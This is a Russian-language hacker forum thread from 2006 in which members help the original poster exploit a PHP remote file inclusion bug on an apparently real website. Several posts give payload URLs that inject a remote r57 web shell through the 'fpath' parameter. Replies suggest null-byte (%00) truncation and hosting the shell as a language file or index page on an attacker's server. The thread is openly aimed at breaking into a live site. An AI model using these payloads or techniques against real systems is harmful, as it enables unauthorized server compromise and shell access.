KaK ZaNUll it URL

Discussion in 'PHP' started by netadmin, 11 Sep 2006.

  1. netadmin

    netadmin New Member

    Joined:
    28 Sep 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    -4
    Help Include Bug OR Else

    mne ochen interesna nu kak zanulit toist ignoriravat ili zdelat tak shto
    naprimer
    www.chtota.ru/fail.php?fail=http://fail.ru/fail.php?----a zdes kod shtobi posli etava ne rabotal kod nekakoi
    v smisle kagda ia pishu
    naprimer
    http://www.zzzzzzz.com/dddd/config.php?fpath=http://HackScripts.by.ru/r57shelll.php

    sait atvichaet:
    Warning: Failed opening 'http://HackScripts.by.ru/r57shell.php./language/lang_slovenian.php' for inclusion (include_path='.;c:\php4\pear') in d:\server\radiobakla\puma\config.php on line 95
    poniali ?
    prashu abisnite
     
    #1 netadmin, 11 Sep 2006
    Last edited: 11 Sep 2006
    2 people like this.
  2. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
  3. netadmin

    netadmin New Member

    Joined:
    28 Sep 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    -4
    a ti ne mojes atvichat na vapros mne ne nada vso eta
    chto mne nada ia uje napisal esli ne znaish vapshe ne pishi
     
  4. tclover

    tclover nobody

    Joined:
    13 Dec 2005
    Messages:
    741
    Likes Received:
    682
    Reputations:
    287
    14 n3 p0n14| (h70 71 mn3 n4p154| d4j3
     
    1 person likes this.
  5. netadmin

    netadmin New Member

    Joined:
    28 Sep 2005
    Messages:
    29
    Likes Received:
    3
    Reputations:
    -4
    a ti v Md5 pishesh da zashifrovanaa :D
     
  6. hidden

    hidden 7H3 0N3

    Joined:
    23 Apr 2006
    Messages:
    550
    Likes Received:
    332
    Reputations:
    386
    Я расшифровал ;)
    Попробуй так.
    http://www.zzzzzzz.com/dddd/config.php?fpath=http://HackScripts.by.ru/r57shelll.php%00
     
  7. [hidden]

    [hidden] Elder - Старейшина

    Joined:
    5 Nov 2005
    Messages:
    70
    Likes Received:
    19
    Reputations:
    7
    2netadmin: tclover выражается на языке элитных хакеров=) "14 n3 p0n14| (h70 71 mn3 n4p154| d4j3" в переводе значит "Я не понял что ты мне написал даже"

    Этот язык тебе придеЦЦа выучить в первую очередь, одепт!
     
  8. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    Оффтоп. Транслитщики, очень вас прошу, юзайте translit.ru!
     
  9. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    А мне понравилось, как ты засветил сайт =)

    Короче если проследить вывод на экран, то можно заметить что он подставляет точку, после вводимого значения fpath... Тоесть например вводим http://yyy.ru, то он подставляет как http://yyy.ru./language/lang_slovenian.php

    Думаю понял... Вот еслиб не было точки, тогда можно было бы замутить шелл... Например создать файл lang_slovenian.php с содержанием шелла, поместить в папку language и залить на сайт...
    А потом просто ввести сайт, куда залили language...
     
    #9 bul.666, 11 Sep 2006
    Last edited: 11 Sep 2006
  10. SMiX

    SMiX Elder - Старейшина

    Joined:
    25 Jul 2005
    Messages:
    227
    Likes Received:
    55
    Reputations:
    29
    Неохота напрягать глаза, читая транслит, но вроде суть проблемы ясна.
    Попробуй подставить в параметр такое:
    http://xaxa.ru%00
    А на сайте хаха.ру в индекс суем шелл...
     
  11. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Я же помойму все объяснил, что инколуд не пройдет...